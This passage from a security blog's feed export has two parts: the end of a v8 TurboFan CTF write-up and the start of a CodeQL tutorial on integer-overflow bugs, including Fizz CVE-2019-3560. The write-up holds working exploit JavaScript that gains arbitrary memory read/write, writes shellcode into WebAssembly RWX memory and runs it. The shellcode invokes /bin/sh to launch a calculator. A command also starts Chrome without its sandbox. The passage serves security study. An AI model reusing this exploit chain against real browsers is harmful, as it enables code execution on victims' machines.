<span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">112</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">131</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">6</span>, <span class="number">129</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">145</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">2</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">6</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">109</span>, <span class="number">111</span>, <span class="number">114</span>, <span class="number">121</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">102</span>, <span class="number">117</span>, <span class="number">110</span>, <span class="number">99</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">136</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">0</span>, <span class="number">1</span>, <span class="number">130</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">11</span>]);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode), &#123;&#125;);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 将WasmJSFunction 布置到与 oob_arr 数组相同的内存段上</span></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 这里写入了一个哨兵值0x233333，用于查找 WasmJSFunction 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> <span class="title class_">WasmJSFunctionObj</span> = &#123; <span class="attr">guard</span>: <span class="title class_">Int64ToFloat64</span>(<span class="number">0x233333</span>), <span class="attr">wasmAddr</span>: <span class="title class_">WasmJSFunction</span> &#125;;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> <span class="title class_">WasmJSFunctionIndex</span> = -<span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 任意地址读写原语 -- *******/</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 确定backing_store_offset 以及 WasmJSFunctionIndex</span></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 只用一个for循环，只遍历一次</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> val = <span class="title class_">Float64ToInt64</span>(oob_arr[i]);</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 开始查找哨兵值</span></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 在查找array_buffer的backing_store时，注意DataView在Array_buffer高地址处</span></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 查找哨兵值时有可能会查找到错误的位置，因此这里只取查找到的第一个地方</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (backing_store_offset == -<span class="number">1</span> &amp;&amp; val == <span class="number">0x0000023300000000</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            backing_store_offset = i + <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find backing_store offset: &quot;</span> + backing_store_offset);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span> &amp;&amp; val == <span class="number">0x233333</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title class_">WasmJSFunctionIndex</span> = i + <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunctionAddr offset: &quot;</span> + <span class="title class_">WasmJSFunctionIndex</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 如果都找到了就不用再找，以免碰上SIGMAP</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (backing_store_offset != -<span class="number">1</span> &amp;&amp; <span class="title class_">WasmJSFunctionIndex</span> != -<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 简单确认一下是否成功找到 backing_store</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (backing_store_offset == -<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">throw</span> <span class="string">&quot;backing_store is not found!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 简单确认一下是否成功找到 WasmJSFunctionAddr</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">throw</span> <span class="string">&quot;WasmJSFunctionAddr is not found!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">read_8bytes</span>(<span class="params">addr</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> data_view.<span class="title function_">getBigInt64</span>(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">write_8bytes</span>(<span class="params">addr, data</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span></span><br><span class="line"><span class="language-javascript">        data_view.<span class="title function_">setBigInt64</span>(<span class="number">0</span>, <span class="title class_">BigInt</span>(data), <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 布置 wasm 地址以及获取 RWX 内存地址 -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">prettyHex</span>(<span class="params">bigint</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + <span class="title class_">BigInt</span>.<span class="title function_">asUintN</span>(<span class="number">64</span>, bigint).<span class="title function_">toString</span>(<span class="number">16</span>).<span class="title function_">padStart</span>(<span class="number">16</span>, <span class="string">&#x27;0&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 WasmJSFunction 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmJSFunctionAddr</span> = <span class="title class_">Float64ToInt64</span>(oob_arr[<span class="title class_">WasmJSFunctionIndex</span>]) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunction address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmJSFunctionAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 SharedFunctionInfo 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">SharedFunctionInfoAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmJSFunctionAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x18</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find SharedFunctionInfoAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">SharedFunctionInfoAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 WasmExportedFunctionData 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmExportedFunctionDataAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">SharedFunctionInfoAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x8</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmExportedFunctionDataAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmExportedFunctionDataAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 WasmInstanceObject 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmInstanceObjectAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmExportedFunctionDataAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x10</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmInstanceObjectAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmInstanceObjectAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 JumpTableStart 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">JumpTableStartAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmInstanceObjectAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0xe8</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find JumpTableStartAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">JumpTableStartAddr</span>));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 写入并执行shell code -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> shellcode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(</span></span><br><span class="line"><span class="language-javascript">        [<span class="number">0x6a</span>, <span class="number">0x3b</span>, <span class="number">0x58</span>, <span class="number">0x99</span>, <span class="number">0x48</span>, <span class="number">0xbb</span>, <span class="number">0x2f</span>, <span class="number">0x62</span>, <span class="number">0x69</span>, <span class="number">0x6e</span>, <span class="number">0x2f</span>, <span class="number">0x73</span>, <span class="number">0x68</span>, <span class="number">0x00</span>, <span class="number">0x53</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe7</span>, <span class="number">0x68</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x52</span>, <span class="number">0xe8</span>, <span class="number">0x1c</span>, <span class="number">0x00</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x44</span>, <span class="number">0x49</span>, <span class="number">0x53</span>, <span class="number">0x50</span>, <span class="number">0x4c</span>, <span class="number">0x41</span>, <span class="number">0x59</span>, <span class="number">0x3d</span>, <span class="number">0x3a</span>, <span class="number">0x30</span>, <span class="number">0x20</span>, <span class="number">0x67</span>, <span class="number">0x6e</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x6f</span>, <span class="number">0x6d</span>, <span class="number">0x65</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x61</span>, <span class="number">0x6c</span>, <span class="number">0x63</span>, <span class="number">0x75</span>, <span class="number">0x6c</span>, <span class="number">0x61</span>, <span class="number">0x74</span>, <span class="number">0x6f</span>, <span class="number">0x72</span>, <span class="number">0x00</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x56</span>, <span class="number">0x57</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x0f</span>, <span class="number">0x05</span>]</span></span><br><span class="line"><span class="language-javascript">    );</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 写入shellcode </span></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] writing shellcode ... &quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// (尽管单次写入内存的数据大小为8bytes，但为了简便，一次只写入 1bytes 有效数据)</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; shellcode.<span class="property">length</span>; i++)</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">write_8bytes</span>(<span class="title class_">JumpTableStartAddr</span> + <span class="title class_">BigInt</span>(i), shellcode[i]);</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 执行shellcode</span></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try to execute shellcode ... &quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmJSFunction</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><p>使用如下命令以执行exp:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chrome/chrome --no-sandbox --user-data-dir=./userdata http:<span class="comment">//127.0.0.1:8000/test.html</span></span><br></pre></td></tr></table></figure><blockquote><p>尽管给出的附件打了no-sandbox的patch，但实际exp仍然无法执行，必须附加参数<code>--no-sandbox</code>才能成功触发，玄学问题XD。</p></blockquote><p>效果如下：</p><p>![img](v8-turboFan/exp.gif %}</p></li></ul><h2 id="七、参考">七、参考</h2><ol><li><a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">Introduction to TurboFan</a></li><li><a href="https://de4dcr0w.github.io/google-ctf-2018-browser-pwn%E5%88%86%E6%9E%90.html">google-ctf-2018-browser-pwn分析</a></li><li><a href="https://mem2019.github.io/jekyll/update/2019/08/09/Google-CTF-2018-Final-JIT.html">Why I failed to trigger Bound Check Elimination in Google CTF 2018 Final JIT</a></li><li><a href="https://xz.aliyun.com/t/3348?spm=5176.12901015.0.i12901015.1bc1525cy9bvzk">Google CTF justintime writeup - 先知社区</a></li></ol>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;一、前言&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;v8 是一种 JS 引擎的实现，它由Google开发，使用C++编写。&lt;/p&gt;
&lt;p&gt;v8 被设计用于提高网页浏览器内部 JavaScript 代码执行的性能。为了提高性能，v8 将会把 JS 代码转换为更高效的机器码，而非传统的使用解释器执行。因此 v8 引入了 &lt;strong&gt;JIT (Just-In-Time)&lt;/strong&gt; 机制，该机制将会在运行时动态编译 JS 代码为机器码，以提高运行速度。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;TurboFan是 v8 的优化编译器之一，它使用了 &lt;a href=&quot;https://darksi.de/d.sea-of-nodes/&quot;&gt;sea of nodes&lt;/a&gt; 这个编译器概念。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;sea of nodes 不是单纯的指某个图的结点，它是一种&lt;strong&gt;特殊中间表示&lt;/strong&gt;的图。&lt;/p&gt;
&lt;p&gt;它的表示形式与一般的CFG/DFG不同，其具体内容请查阅上面的连接。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;TurboFan的相关源码位于&lt;code&gt;v8/compiler&lt;/code&gt;文件夹下。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/chrome/"/>
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>深入学习CodeQL by security_lab</title>
    <link href="https://kiprey.github.io/2020/12/secLab-CodeQL-learning/"/>
    <id>https://kiprey.github.io/2020/12/secLab-CodeQL-learning/</id>
    <published>2020-12-24T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:40.097Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p><a href="https://github.com/github/securitylab/tree/main/CodeQL_Queries/cpp">github SecurityLab</a> 上有多个CodeQL的使用例子</p><p>通过学习这些例子，我们可以加深对CodeQL的了解，以便于更好的使用它。</p><span id="more"></span><h2 id="二、ChakraCore-bad-overflow-check">二、ChakraCore-bad-overflow-check</h2><h3 id="1-漏洞模式">1. 漏洞模式</h3><ul><li><p>这个例子主要是学习如何查找出<strong>错误的</strong>整数相加溢出判断逻辑。</p></li><li><p>以一个例子为例</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">checkOverflow</span><span class="params">(<span class="type">unsigned</span> <span class="type">short</span> x, <span class="type">unsigned</span> <span class="type">short</span> y)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// BAD: comparison is always false due to type promotion</span></span><br><span class="line">  <span class="keyword">return</span> (x + y &lt; x);  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里相加后的结果由于会自动隐式转换至<code>int</code>类型，因此该加法操作的结果将始终<strong>不会溢出</strong>。这会使得程序<strong>无法正常判断是否存在溢出操作</strong>，而这就是漏洞所在。</p></li><li><p>但在以下这个例子中</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">checkOverflow</span><span class="params">(<span class="type">unsigned</span> <span class="type">short</span> x, <span class="type">unsigned</span> <span class="type">short</span> y)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> ((<span class="type">unsigned</span> <span class="type">short</span>)(x + y) &lt; x);  <span class="comment">// GOOD: explicit cast</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>由于相加后的结果会进行强制类型转换，因此该加法操作的结果<strong>可以产生溢出</strong>，溢出判断逻辑工作正常。</p></li></ul><h3 id="2-QL的编写">2. QL的编写</h3><ul><li><p>首先明确目的，我们要查找出<strong>错误的检测溢出的代码</strong>，即上述中的第一个例子。</p></li><li><p>因此，我们先列一下这个模式的必要条件，即通过什么条件来查找出这个漏洞</p><ul><li><p>需要获取符合<code>var1 + var2 &lt;compare&gt; var1</code>的语句</p></li><li><p>比较操作符<code>RelationalOperation</code>左右两边各有一个<code>AddExpr</code>和<code>LocalScopeVariable</code> var1</p></li><li><p>加法操作<code>AddExpr</code>内部所含有的一个<code>LocalScopeVariable</code> va1，与上面的var1是同一个。</p></li><li><p>操作数 var1 的位数必须小于32位</p></li><li><p>加法运算的结果不执行强制类型转换，或者强转后的大小大于32位</p><blockquote><p>这个条件会使得溢出检测算法无效，而这就是我们的目标所在。</p></blockquote></li></ul></li><li><p>故最终的QL代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="comment">/** Matches `var &lt; var + ???`. */</span></span><br><span class="line"><span class="function">predicate <span class="title">overflowCheck</span><span class="params">(LocalScopeVariable var, AddExpr add, RelationalOperation compare)</span></span>&#123;</span><br><span class="line">  <span class="comment">/* 当前的relationalOperation，其左右两边分别是一个变量以及一个加法语句 */</span></span><br><span class="line">  compare.<span class="built_in">getAnOperand</span>() = var.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">  compare.<span class="built_in">getAnOperand</span>() = add <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 同时这个变量还是加法语句中的一个操作数 */</span></span><br><span class="line">  add.<span class="built_in">getAnOperand</span>() = var.<span class="built_in">getAnAccess</span>()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from LocalScopeVariable var, AddExpr add</span><br><span class="line">where <span class="built_in">overflowCheck</span>(var, add, _)    <span class="comment">/* 获取可能存在溢出的点 */</span></span><br><span class="line">  <span class="keyword">and</span> var.<span class="built_in">getType</span>().<span class="built_in">getSize</span>() &lt; <span class="number">4</span>   <span class="comment">/* 当前的操作数大小要小于4字节 */</span></span><br><span class="line">  <span class="keyword">and</span> <span class="keyword">not</span> add.getConversion+().<span class="built_in">getType</span>().<span class="built_in">getSize</span>() &lt; <span class="number">4</span> <span class="comment">/* 限制加法的位数 &gt;= 32 */</span></span><br><span class="line">select add, <span class="string">&quot;Overflow check on variable of type &quot;</span> + var.<span class="built_in">getUnderlyingType</span>()</span><br></pre></td></tr></table></figure><blockquote><p>注意where语句中使用的一个通配符<code>_</code>，该通配符用于表示<strong>任何数据集</strong>。</p></blockquote></li></ul><h2 id="三、Facebook-Fizz-CVE-2019-3560">三、Facebook_Fizz_CVE-2019-3560</h2><h3 id="1-漏洞模式-2">1. 漏洞模式</h3><ul><li><p>该漏洞是一个由<code>+=</code>符所引起的整型溢出漏洞 - <a href="https://github.com/facebookincubator/fizz/blob/eaa81af854bef509c3c1d7c83df0cd0b084a0fef/fizz/record/PlaintextRecordLayer.cpp#L42">src</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">folly::Optional&lt;TLSMessage&gt; <span class="title">PlaintextReadRecordLayer::read</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    folly::IOBufQueue&amp; buf)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (<span class="literal">true</span>) &#123;</span><br><span class="line">        <span class="comment">// 获取当前buf所读取到的指针位置</span></span><br><span class="line">        folly::<span class="function">io::Cursor <span class="title">cursor</span><span class="params">(buf.front())</span></span>;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="comment">/* ... */</span>) &#123;</span><br><span class="line">          <span class="keyword">if</span> (<span class="comment">/* ... */</span>) &#123;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="comment">// 从当前cursor指向的位置中，读取一个uint16_t</span></span><br><span class="line">            <span class="keyword">auto</span> length = cursor.<span class="built_in">readBE</span>&lt;<span class="type">uint16_t</span>&gt;();</span><br><span class="line">            <span class="comment">// 检查是否接收到足够多的数据以继续解析</span></span><br><span class="line">            <span class="keyword">if</span> (buf.<span class="built_in">chainLength</span>() &lt; (cursor - buf.<span class="built_in">front</span>()) + length) &#123;</span><br><span class="line">              <span class="keyword">return</span> folly::none;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// !!! 将 length执行加法操作</span></span><br><span class="line">            length +=</span><br><span class="line">                <span class="built_in">sizeof</span>(ContentType) + <span class="built_in">sizeof</span>(ProtocolVersion) + <span class="built_in">sizeof</span>(<span class="type">uint16_t</span>);</span><br><span class="line">            <span class="comment">// 修改buf的指针，使得下一次获取cursor时的位置移至后面</span></span><br><span class="line">            <span class="comment">// 详细函数见最下方</span></span><br><span class="line">            buf.<span class="built_in">trimStart</span>(length);</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="comment">// ...</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">IOBuf::trimStart</span><span class="params">(std::<span class="type">size_t</span> amount)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">DCHECK_LE</span>(amount, length_);</span><br><span class="line">    data_ += amount;</span><br><span class="line">    length_ -= amount;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure></li><li><p>这段代码中将会从传入的网络数据包中读取一个<code>uint16_t</code>，并将其传给<code>length</code>。<strong>即<code>length</code>是攻击者可控的</strong>。同时，代码中的<code>if</code>语句只是用于检测是否接收到足够多的数据，并<strong>不会检测可能存在的溢出操作</strong>。</p></li><li><p>因此，倘若<code>length</code>在执行<code>+=</code>操作时溢出至0，那么在执行<code>buf.trimStart</code>函数时，<code>buf</code>中指向当前正在处理数据的<strong>指针将不会被修改</strong>。也就是说，在循环的下一次执行中，cursor会被<strong>设置为与当前循环相同的cursor</strong>，然后读取<strong>与当前循环相同的length</strong>，之后length<strong>继续溢出至0</strong>，buf的指针<strong>仍然没有被修改</strong>。如此循环往复，程序将陷入循环中<strong>无法跳出</strong>，这样便造成了拒绝服务攻击（DoS）。</p></li></ul><h3 id="2-QL的编写-2">2. QL的编写</h3><ul><li><p>先列出这个漏洞的必要条件</p><ul><li>不受信任的输入</li><li>向下的类型转换</li></ul></li><li><p>首先，我们需要确定一个不受信任的输入。在Fizz中，数据通常按照<strong>网络字节顺序</strong>来通过套接字发送，因此网络字节顺序通常需要转换为<strong>主机字节顺序</strong>，这就意味着<code>ntohs</code>和<code>ntohl</code>通常是<strong>不受信任输入的来源之一</strong>。但是，Fizz使用<code>Endian</code>类来处理字节顺序转换。因此在查询时就必须设置数据流源头为<code>Endian</code>类变量。</p><p>以下是一个用于查找所有<code>Endian::big</code>函数声明的QL代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.IR</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * The endianness conversion function `Endian::big()`.</span></span><br><span class="line"><span class="comment"> * It is Folly&#x27;s replacement for `ntohs` and `ntohl`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EndianConvert</span> extends Function &#123;</span><br><span class="line">    <span class="built_in">EndianConvert</span>() &#123;</span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getName</span>() = <span class="string">&quot;big&quot;</span> <span class="keyword">and</span></span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getDeclaringType</span>().<span class="built_in">getName</span>().<span class="built_in">matches</span>(<span class="string">&quot;Endian&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from EndianConvert ec</span><br><span class="line">select ec</span><br></pre></td></tr></table></figure><p>因此我们可以查找出调用<code>Endian::big</code>函数的<code>FunctionCall</code>，不受信任的数据将从这个<code>FunctionCall</code>中流出。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Holds if `i` is an 